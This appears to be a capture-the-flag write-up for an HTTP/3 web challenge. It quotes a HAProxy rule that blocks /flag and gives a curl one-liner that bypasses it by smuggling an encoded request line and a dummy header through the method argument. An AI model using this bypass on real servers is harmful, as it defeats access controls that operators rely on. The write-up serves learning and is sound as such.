Tags: web http3
### Challenge Description
> HTTP/3 is just the best version of HTTP, wait a few years, until setting up an HTTP/3 server will not be a pain, and you’ll see. I hid a secret on /flag, you can only get it if you become a real HTTP/3 enjoyer. NOTE: This challenge uses only HTTP/3, browsers are a bit hesitant in using it by default, so you’ll have to use explicit arguments to do so. In chrome you can do the following: chrome --enable-quic --origin-to-force-quic-on=enjoyer.challs.ctf.srdnlen.it
### Initial Analysis
As seen in the description of the challenge, there is a `/flag` route. Trying a simple curl command:
curl https://enjoyer.challs.ctf.srdnlen.it/flag
it was not possible to reach the route since it uses HTTP/3. However, with curl, you can specify the `--http3` flag to use version 3 of HTTP. But when trying:
curl --http3 https://enjoyer.challs.ctf.srdnlen.it/flag
it returned a 403 Forbidden error due to a proxy rule set by HAProxy. In fact, as we can see from the attached files, specifically in the `haproxy.cfg` file, the following rule is specified:
acl restricted_flag path_sub,url_dec -m sub -i /flag
http-request deny if restricted_flag
This denies all requests containing the `/flag` route. Therefore, it is a 403 bypass challenge.
### Exploit
This challenge can be solved by URL encoding `/flag` and specifying a header. I found the explanation and exploit on [StackOverflow](https://stackoverflow.com/questions/63689649/make-an-http-request-without-a-forward-slash/76882066#76882066):
echo "\n"; curl --insecure -X "$(echo -en 'GET %2fflag 1/\r\nX-Ignore-Injection:')" https://enjoyer.challs.ctf.srdnlen.it --http3
### Flag